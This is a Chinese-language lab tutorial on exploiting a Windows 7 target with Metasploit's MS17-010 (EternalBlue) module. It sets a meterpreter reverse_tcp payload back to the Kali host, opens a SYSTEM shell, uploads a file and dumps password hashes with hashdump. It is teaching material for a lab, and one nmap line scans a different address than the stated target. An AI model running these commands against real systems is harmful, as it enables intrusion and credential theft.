情况介绍
攻击机kali中使用ifconfig可以看到ip是192.168.0.106。
靶机Window 7使用ipconfig可以看到ip是192.168.0.100。
Nmap
Nmap全称为Network Mapper,又成为“上帝之眼”,可以扫描ip和端口。
然后在kali攻击机上使用nmap 192.168.0.103可以看一下靶机里边开放的端口和对应服务。
Metasploit
sudo su - root把权限提高至root(最高权限)。
msfconsole进入到命令里边。
search MS17-010搜索漏洞脚本。
use 0选择攻击脚本。
set rhost 192.168.0.100设置靶机ip为192.168.0.100。
set lhost 192.168.0.106设置攻击地址为192.168.0.106。
set payload windows/x64/meterpreter/reverse_tcp设置攻击脚本。
run进行执行。
getuid看一下登录到Window 7上边的权限。
shell进入到Windows 7命令行里边。
ipconfig查看Windows 7的ip。
可以看到有许多乱码,使用chcp 65001修改编码,再次使用ipconfig查看Windows 7的ip就发现乱码基本上没有了。
whoami可以看到当前用户是system。
按下Ctrl+c,然后输入y退出去Window 7命令行。
screenshot截了一张图。
截图打开如下:
vim good.txt把test upload写进去。
upload /root/good.txt c:\\good.txt把攻击机kali中/root/good.txt发送到靶机Window 7中c:\\good.txt。
在靶机Window 7中打开c:\\good.txt。
hashdump可以看一下用户信息。
可以在搜索引擎里边搜索meterpreter命令,看看其他命令。
我的微信号也是zhaoseaside,欢迎大家加我,提供实验镜像。
